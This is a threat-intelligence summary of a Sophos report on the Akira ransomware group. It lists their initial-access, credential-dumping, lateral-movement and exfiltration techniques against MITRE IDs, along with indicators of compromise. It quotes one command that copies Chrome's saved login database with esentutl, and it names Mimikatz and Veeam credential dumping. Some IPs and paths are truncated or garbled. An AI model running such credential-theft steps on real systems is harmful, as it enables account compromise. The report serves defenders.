Threat Research

Akira, again: The ransomware that keeps on taking

Securonix

Sophos’ analysis shows Akira expanding from ransomware deployments toward extortion-focused operations with data exfiltration as a primary objective, alongside ongoing encryption activity across multiple regions and sectors. The attackers employ a wide range of credential-access, defense-evasion, and C2 techniques, including AnyDesk for remote access, Veeam credential dumping, and SMB/RDP-based lateral movement, while occasionally using bespoke backdoors and multiple ransomware variants.
#Akira #AnyDesk #Veeam #MEGA #WinRAR #rclone

Keypoints

  • Akira actors are increasingly performing extortion-only operations—exfiltrating data without encrypting systems in some incidents.
  • Megazord ransomware was observed in only one case; most attacks used the Akira ransomware family with multiple binary names (e.g., w.exe, Lck.exe, 1.exe, locker.exe).
  • A previously unreported backdoor/exe used for C2 indicates a shift toward new persistence mechanisms beyond dual-use agents.
  • Defenses are frequently targeted: actors attempt to uninstall or disable Sophos, and sometimes disable Windows Defender before or during activity.
  • Initial access commonly occurs via unauthorized VPN logons without MFA, including exploitation of Cisco VPN vulnerabilities (CVE-2023-20269).
  • Credential access and discovery techniques are broad: LSASS memory dumps, NTDS.dit/NTDSUtil offline dumps, Veeam credential dumping, browser credential harvesting, and AD/Group enumeration.
  • Lateral movement relies on RDP with cached local admin accounts, SMB with RDP, and tools like wmiexec/PSEXESVC; discovery uses Get-ADComputer and AD group queries.
  • Exfiltration uses WinRAR, rclone, and MEGA, with large data transfers to attacker-controlled IPs and occasionally compression into ZIP/RAR archives before exfiltration.
  • Impact typically includes encryption of files (akira extension) and ransom notes, with dwell times ranging from <1 day to 25 days.

MITRE Techniques

  • [T1133] External Remote Services – Akira actors access VPNs without MFA to gain initial access. ‘unauthorized logon to VPNs by accounts lacking multi-factor authentication (MFA). Typically, Sophos observed Akira actors specifically targeting Cisco VPN products without MFA enabled’
  • [T1190] Exploit Public-Facing Application – CVE-2023-20269 exploited in Cisco ASA to establish unauthorized remote access. ‘exploited CVE-2023-20269 in an organization’s Cisco ASA’
  • [T1003.001] OS Credential Dumping – LSASS memory dump and in-memory credentials. ‘minidump of the LSASS process memory and acquire additional credentials stored in memory’
  • [T1003.004] NTDS – NTDS.dit offline dumps and related tooling. ‘NTDSUTIL-CREATE-FULL-1’ and ‘NTDS.dit’ with offline capture commands
  • [T1003.005] OS Credential Dumping (Veeam) – Veeam Credential Dumper scripts to dump credentials from Veeam backup service. ‘Veeam Credential Dumper scripts to dump credentials stored in the Veeam backup service to plaintext’
  • [T1555.003] Credentials in Web Browsers – Chrome credentials harvested from user data. ‘cached Chrome browser credentials’
  • [T1047] Windows Management Instrumentation – wmiexec used to move laterally. ‘wmiexec to perform lateral movement’
  • [T1059.001] PowerShell – PowerShell ISE session used for credential dumping operations. ‘interactive PowerShell ISE session’
  • [T1562.004] Impair Defenses – Uninstalling/disabling security tools (Sophos/Defender). ‘uninstall Sophos endpoint’ and ‘disable Windows Defender real-time monitoring’
  • [T1021.001] Remote Desktop Protocol – RDP used with local admin accounts for lateral movement. ‘RDP with valid local administrator user accounts’
  • [T1021.002] SMB – SMB used in conjunction with RDP for lateral movement; ransomware spreads over SMB. ‘encrypted via SMB shares’
  • [T1047] Windows Management Instrumentation (WMI) – wmiexec technique observed for lateral movement. ‘wmiexec’
  • [T1547.001] Registry Run Keys/Startup Folder – SpecialAccounts registry key used to persist. ‘Special Accounts registry key’ to maintain logon persistence
  • [T1136] Create Account – New user/domain groups created and added to administrators to persist. ‘create a new domain group … added’
  • [T1543.003] Create/Modify System Process: Windows Service – nssm.exe used to create a Sysmon service to enable tunneling. ‘service sysmon’ creation
  • [T1560] Archive Collected Data – Data compressed into RAR archives before exfiltration. ‘compress approximately 34GB of data into multiple archive files’
  • [T1041] Exfiltration – Data exfiltrated to attacker-controlled IPs via Chrome, rclone, MEGA. ‘exfiltrate data to their attacker-controlled IPs’
  • [T1486] Data Encrypted for Impact – Akira encrypts files with the “akira” extension and deletes Shadow Copies. ‘encrypt files with the “akira” extension’

Indicators of Compromise

  • [File] w.exe, Lck.exe, 1.exe, locker.exe – ransomware binaries observed in multiple incidents. ‘the ransomware binary had names such as w.exe, Lck.exe, 1.exe, locker.exe’
  • [File] akira_readme.txt – ransom note left on victims’ devices. ‘ransom note named “akira_readme.txt”’
  • [File] Former Employee’s Data.rar, Benefits.rar, Workerscomp.rar – exfiltration archives created and uploaded. ‘
  • [File] ck.exe and Sysmon service created via nssm (Sysmon) for tunneling tools. ‘the malicious service ‘sysmon,’ which executed sysmon.exe and launched tunneling tools’
  • [File] AnyDesk.exe, dwagent.exe – remote-access tools used for C2. ‘AnyDesk to establish persistent remote access’ and ‘dwagent.exe’ installer
  • [File] chrome.exe and related Chrome data access scripts – browser credential access. ‘chome credential dump via Chrome data’
  • [IP] 170.130.165.171; 13.107.42.12; 185.82.216.56; 104.200.72.33 – attacker-controlled IPs for data exfil
  • [IP] 99.35.22; 206.25.71; 203.127.13; 99.35.202 – MEGA file-sharing service IPs used for exfil
  • [Tool] Mimikatz.exe; BypassCredGuard.exe; WebBrowserPassView.exe – credential extraction and password-stealing tools
  • [Tool] esentutl.exe – Chrome credentials extraction operation. ‘esentutl.exe /y “C:UsersAppDataLocalGoogleChromeUser DataDefaultLogin Data”‘
  • [Tool] Veeam Credential Dumper (scripts) – credential dumping from Veeam backups. ‘Veeam Credential Dumper scripts’

Read more: https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint